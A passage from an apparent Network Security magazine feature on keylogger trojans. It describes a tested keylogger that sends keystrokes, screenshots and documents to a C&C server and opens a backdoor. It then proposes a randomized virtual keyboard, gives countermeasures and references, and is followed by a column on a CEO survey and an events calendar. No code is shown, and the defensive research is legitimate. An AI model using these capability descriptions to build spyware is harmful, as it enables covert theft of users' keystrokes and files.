office files (DOC, XLS and PPT), as shown
in Figure 5. This feature can be extended to
include more types of files, including MP3,
MP4, JPG and many others.
A limited keylogger option that was
tested and is working for Windows 7,
includes opening a backdoor, as illustrat-
ed in Figure 6, and can be extended for
future research involving features that
may include deleting user files, rebooting
the user system or even uninstalling the
keylogger itself and taking control of the
victim’s webcam on a real-time basis.
Proposed
countermeasures
Anti-virus or anti-malware scanners do
not detect or remove most hardware or
software keyloggers. However, security
measures to detect keyloggers can be
undertaken by users themselves to rec-
ognise the existence of such malicious
applications or devices on their systems.
Some of the standard indicators are
warning alerts from firewalls or anti-
virus, some keyboard keys may not work
properly, it may take time for characters
to appear on screen, the mouse may not
function appropriately and double clicks
or dragging and dropping may behave
strangely. This may happen even after
restarting the system.
Preventive steps should always be per-
formed regularly by users to thwart key-
logger trojans. Some measures include:
Auditing computer logs regularly.
• Using detection and prevention tech-
nology applications such as firewalls,
February 2020 Network Security
FEATURE
Figure 2:
Keylogger
options on
the C&C server.
anti-virus, anti-malware, anti-spyware
and anti-spam applications.
• Using on-screen keyboards.
• Ensuring that security patches are
always up to date.
• Always downloading applications
from trusted sources.
• Using only licensed software.
Other safeguards include explicitly Figure 3: Listener receiving keystrokes
restricting application privileges, not con- (option 1).
necting to the Internet when logged as
an administrator, always using one-time
passwords (OTPs) if possible and using
an automatic form filler program when
submitting forms. In addition, wireless,
infrared, Bluetooth, laser and virtual key-
boards or touchscreen monitors can make
life more difficult for keyloggers.
Figure 4: The user’s screenshots (option 2).
Random keyboard
Smartphones and new operating systems
such as Windows 10 offer touch screens
with high mobility and no embedded
physical keyboard in the user system.
The use of virtual keyboards has become
common and has the same physical key-
board structure in terms of layout.
The authors propose a unique Figure 5: C&C server receiving user system
files (option 3).
approach to resolve the keylogger issue
by use of random layouts instead of
having the standard QWERTY or ABC
keyboard layouts. The only issue is users
need to get accustomed to the random
keys displayed on the screen each time. Figure 6: Open backdoor on Windows 7.
The algorithm in Figure 7 presents the
proposed virtual keyboard layout. for the original and proposed keyboard
The authors calculated the estimated layouts. The results confirmed that the
distance between keys on a virtual probability reduces for the proposed
keyboard, measured as a probability keyboard layout by around 50%, which
of having random and varied spacing lends credence that the proposed virtual
between two keys, and this was done layout can prove to be effective against
17
 FEATURE
Figure 7:
Algorithm for
the proposed
virtual key-
board.
keylogger trojans. The authors measured
the typing time for each message for a
set of 15 different users. Five messages
with different lengths were selected, and
Figure 8 illustrates the time taken for
typing which depends on the message
length for different keyboards.
From the above research and tests, the
results reveal that the virtual layout takes
about 50% longer as compared to the
QWERTY keyboard with random spac-
ing. However, the time is around 75% less
when compared to the random layout.
Conclusion
Like most cyber security threats, the only
possible way to stay safe from keyloggers
is regular scanning for any anomalies
from outbound or inbound traffic, the
use of anti-virus and anti-spyware scan-
ners and, most importantly, user aware-
ness. In this research, the authors demon-
strated a successful keylogger technique,
gathering keystrokes and screenshots
along with online transactions, without
Figure 8: Comparing the proposed virtual keyboard with QWERTY and ABC keyboards.
18
Network Security February 2020
any scanner being able to detect the
activities. The proposed layout for virtual
keyboards involves randomly exchanging
vertically adjacent keys from the existing
QWERTY layout, using random spacing.
This can provide high accessibility and
high security simultaneously.
About the authors
Dr Akashdeep Bhardwaj is currently pro-
fessor of cyber security and digital forensics
at University of Petroleum and Energy
Studies (UPES), Dehradun, India. He
has over 25 years of IT industry experience
working for various US and UK organisa-
tions in cyber security, information security
and IT management operation roles.
Dr Sam Goundar has been teaching
information systems, information technol-
ogy, management information systems and
computer science over the past 25 years at
several universities in a number of coun-
tries. He is a senior member of IEEE, a
member of ACS, a member of the IITP,
New Zealand, Certification Administrator
of ETA-I, US and past president of the
South Pacific Computer Society. He also
serves on the IEEE Technical Committee
for Internet of Things, cloud communica-
tion and networking, big data, green ICT,
cyber security, business informatics and
systems, learning technology and smart cit-
ies. He is a member of the IEEE Technical
Society and a panellist with the IEEE
Spectrum for Emerging Technologies.
References
1. Arghire, I. ‘Business users targeted
by HawkEye keylogger malware’.
Security Week, 28 May 2019.
Accessed Jan 2020. www.security-
week.com/business-users-targeted-
hawkeye-keylogger-malware.
2. Cook, J. ‘Cathay Pacific says data
of 9.4 million passengers stolen in
hack’. The Telegraph, 24 Oct 2018.
Accessed Jan 2020. www.telegraph.
co.uk/technology/2018/10/24/
cathay-pacific-says-data-94-million-
passengers-stolen-hack.
3. Mok, D. ‘Personal data of 9.4 mil-
lion Cathay Pacific passengers
leaked’. South China Morning Post,
24 Oct 2018. Accessed Jan 2020.
www.scmp.com/news/hong-kong/
transport/article/2170076/personal-
data-some-94-million-passengers-
cathay-pacific-and.
4. Wajahat, A; Imran, A; Latif, J;
Nazir, A; Bilal, A. ‘A novel approach
of unprivileged keyloggers detec-
tion’. Second IEEE International
Conference on Computing,
Mathematics and Engineering
Technologies (iCoMET), Sukkur,
Pakistan, Pakistan, 2019. DOI:
10.1109/ICOMET.2019.8673404.
5. Kuncoro, P; Kusuma, B. ‘Keyloggers
is a hacking technique that
allows threatening information
on mobile banking user’. Third
IEEE International Conference
on Information Technology,
Information System and Electrical
Engineering (ICITISEE),
Yogyakarta, Indonesia, 2018. DOI:
10.1109/ICITISEE.2018.8721028.
6. Javaheri, D; Hosseinzadeh, M;
Rahmani, M. ‘Detection and
elimination of spyware and ran-
somware by intercepting kernel-
level system routines’. IEEE Access,

Volume 6, 2018. DOI: 10.1109/
ACCESS.2018.2884964.
7. Albabtain, Y; Yang, B. ‘The process
of reverse engineering GPU malware
and provide protection to GPUs’.
17th IEEE International Conference
On Trust, Security and Privacy in
Computing and Communications, and
12th IEEE International Conference
on Big Data Science and Engineering
(TrustCom/BigDataSE), New York,
NY, US, 2018. DOI: 10.1109/
TrustCom/BigDataSE.2018.00248.
8. Sukhram, D; Hayajneh, T.
‘Keystroke logs: are strong pass-
words enough?’. 8th IEEE Annual
Ubiquitous Computing, Electronics
and Mobile Communication
Conference (UEMCON), New
York, NY, US, 2017. DOI: 10.1109/
UEMCON.2017.8249051.
9. Yewale, A; Singh, M. ‘Malware
detection based on opcode fre-
quency’. IEEE International
Conference on Advanced
Communication Control and
Computing Technologies
(ICACCCT), Ramanathapuram,
India, 2016. DOI: 10.1109/
ICACCCT.2016.7831719.
10. Solairaj, A; Prabanand, C; Mathalairaj,
J; Prathap, C; Vignesh, L. ‘Keyloggers
software detection techniques’. 10th
IEEE International Conference on
Intelligent Systems and Control
(ISCO), Coimbatore, India, 2016.
DOI: 10.1109/ISCO.2016.7726880.
11. Tasabeeh, A; Omer, A; Eldewahi A.
‘Random multiple layouts: keyloggers
prevention technique’. Conference
of Basic Sciences and Engineering
Studies (SGCAC), Khartoum,
Sudan, 2016. DOI: 10.1109/
SGCAC.2016.7457997.
12. Tekawade, N; Kshirsagar, S; Sukate,
S; Raut, L; Vairagar, S. ‘Social
engineering solutions for document
generation using key-logger security
February 2020 Network Security
mechanism and QR code’. Fourth
IEEE International Conference on
Computing Communication Control
and Automation (ICCUBEA),
Pune, India, 2018. Doi: 10.1109/
ICCUBEA.2018.8697420.
13. Taekwang, J; Kim, G; Kempke, B;
Henry, M; Chiotellis, N; Pfeiffer,
C. ‘Circuit and system designs of
ultra-low power sensor nodes with
illustration in a miniaturized GNSS
logger for position tracking: Part
I – analog circuit techniques’. IEEE
Transactions on Circuits and Systems
I: Regular Papers, vol.64, 2017. Doi:
10.1109/TCSI.2017.2730600.
14. Wooguil, P; Youngrok, C; Sunki,
Y. ‘High accessible virtual key-
boards for preventing key-log-
ging’. Eighth IEEE International
Conference on Ubiquitous and
Future Networks (ICUFN), Vienna,
Austria, 2016. Doi: 10.1109/
ICUFN.2016.7537017.
15. Tyagi, G; Ahmad, K; Doja, M. ‘A
novel framework for password secur-
ing system from keylogger spyware’.
IEEE International Conference on
Issues and Challenges in Intelligent
Computing Techniques (ICICT),
Ghaziabad, India, 2014. Doi:
10.1109/ICICICT.2014.6781255.
16. Roland, M; Langer, J; Scharinger, J.
‘Practical attack scenarios on secure ele-
ment enabled mobile devices’. Fourth
International Workshop on Near Field
Communication, 2012, pp.19-24.
17. Yunho, L. ‘An analysis on the vulner-
ability of secure keypads for mobile
devices’. Journal of Korean Society
for Internet Information, 2013,
vol.14, no.3, pp.15-21.
18. Marpaung, J; Sain, M; Lee, HJ.
‘Survey on malware evasion tech-
niques: state of the art and challenges’,
14th IEEE International Conference
on Advanced Communication
Technology (ICACT), 2012.
A SUBSCRIPTION INCLUDES:
Online access for 5 users
An archive of back issues
www.networksecuritynewsletter.com
FEATURE
19. Kumar, S; Sehgal, R; Bhatia, J.
‘Hybrid honeypot framework for
malware collection and analy-
sis’. Seventh IEEE International
Conference on Industrial and
Information Systems (ICIIS), 2012.
20. Murugan, S; Kuppusamy, K.
‘System and methodology for
unknown malware attack’. Second
IEEE International Conference on
Sustainable Energy and Intelligent
System (SEISCON 2011).
21. Rosyid, N; Ohrui, M; Kikuchi,
H; Sooraksat, P; Terada, P. ‘A
discovery of sequential attack pat-
terns of malware in botnets’. IEEE
International Conference on Systems
Man and Cybernetics (SMC), 2010.
22. Nassar, M; State, R; Festor, O. ‘VoIP
malware: attack tool & attack sce-
narios’. IEEE ICC 2009.
23. Li, S; Schmitz, R; ‘A novel anti-
phishing framework based on hon-
eypots’. IEEE eCrime Researchers
Summit (eCRIME 2009).
24. Hirano, M; Umeda, T; Okuda, T;
Kawai, E; Yamaguchi, S. ‘T-PIM:
Trusted password input method
against data stealing malware’. Sixth
ACM International Conference on
Information Technology (ITNG 2009).
25. O’Donnell, A. ‘When malware attacks
(anything but Windows)’. IEEE
Security and Privacy Magazine. 2008.
26. Thonnard, O; Dacier, M. ‘A
framework for attack patterns dis-
covery in honeynet data’. Digital
Investigation, 2008, vol.5, pp.128-
139. Accessed Jan 2020. www.
sciencedirect.com/science/article/pii/
S1742287608000431.
27. Doja, M; Kumar, N. ‘Image authen-
tication schemes against keylog-
ger spyware’. Ninth ACM ACIS
International Conference on Software
Engineering, Artificial Intelligence,
Networking, and Parallel/Distributed
Computing (SNPD 2008).
19
 NEWS/CALENDAR
The Firewall
Signs of things to come?
Kate MacMillan, security analyst
In disaster movies, the first act typically
consists of a string of strange, seemingly
insignificant events unnoticed by every-
one except a small band of heroes tuned
into the signs of the coming apocalypse.
Could a rash of CEOs deleting their
social media accounts be such a sign?
PwC has just published its ‘Annual
Global CEO Survey’ and it’s not a fun
read. Pessimism pervades the report,
particularly about the global economy
and the prospects for growth. And while
the report is not specifically focused on
information security, or even IT in gen-
eral, cyber attacks emerge as being very
much ‘top of mind’ for chief executives.
Four-fifths (80%) of the CEOs sur-
veyed cited the category of ‘cyberthreats’
as a major risk to their businesses, mak-
ing it the most commonly listed issue,
beating skills problems (79%) and the
speed of technological change (75%)
as the thing that keeps most of them
awake at night.
Taking a wider view – that of risks
to society as a whole – climate change
and environmental disasters naturally,
and rightfully, take centre stage. But
cyber attacks and data theft are still
high on the list.
The majority of CEOs foresee greater
regulation of content on the Internet
(71%), the break-up of the big tech
companies (68%) and the private sector
being forced to compensate individuals
for the collection of their private data
(51%). More ominously, two-thirds of
them think that the Internet will become
increasingly fractured as governments
impose national or regional legislation
covering content, commerce and privacy.
That’s not a happy thought.
There’s a need, they feel, to create
greater co-operation between organisa-
tions that want to collect and exploit
information for commercial reasons
and governments that are increasingly
legislating to put a brake on abuse of
20
Network Security February 2020
View publication stats
EVENTS
CALENDAR
16–20 March 2020
Troopers
this data. A balance needs to be struck
Heidelberg, Germany
between leveraging data for economic
https://troopers.de
gain and maintaining the trust of
Internet users. Good luck with that.
16–18 March 2020
Not everyone, though, is going to feel
ACM Conference on Data
gloomy reading this report. Information
security professionals, for example,
and Application Security and
might be encouraged that the message
Privacy
they’ve been trying to pound into the New Orleans, LA, US
heads of C-level executives is finally get- www.codaspy.org
ting through. The picture painted by
this report is that CEOs are not only
17–18 March 2020
aware of cyber security threats, but have
Cybersecurity & Cloud Expo
a clearer grasp than you might expect
Global
of many of the complexities around the London, UK
acquisition and use of data. Whether www.cybersecuritycloudexpo.com
that translates into more effective strate-
gies and more generous information
30 March – 1 April 2020
security budgets remains to be seen.
InfoSec World
Florida, US
One of the more intriguing details in
the report is that CEOs are already tak- www.infosecworldusa.com
ing direct action concerning privacy and
data security. Nearly half (48%) reported
7–8 April 2020
that concerns about cyberthreats had
Global Privacy Summit
Washington DC, US
caused them to alter their own behav-
iour with regard to digital platforms and http://bit.ly/2nLBsAy
devices. Many have deleted social media
5–8 May 2020
accounts, and others have requested that
RuhrSec
their personal data held by other com-
Bochum, Germany
panies or platforms be deleted. In some
www.ruhrsec.de
cases, these actions were taken as a result
of straightforward privacy concerns. In
5–6 May 2020
others, the move was a recognition that
Secure360
social media accounts are often a way
Prior Lake, MN, US
that attackers gain a foothold, with busi-
https://secure360.org/secure360-twin-
ness email compromise being a classic
cities/
example. There’s a good reason why it’s
sometimes called ‘CEO fraud’.
6–8 May 2020
Either way, you could argue that
International Privacy +
this phenomenon is a good sign – that
top-level executives who are so often far
Security Forum
Washington DC, US
removed from the day-to-day realities of
cyber security are at last waking up and
www.privacysecurityacademy.com/ipsf-
taking security hygiene seriously, even conference/
to the point of personally taking steps to
secure themselves and the organisation.
14 May 2020
The PwC report is available here:
CRESTCon
London, UK
www.pwc.com/ceosurvey.
www.crestcon.co.uk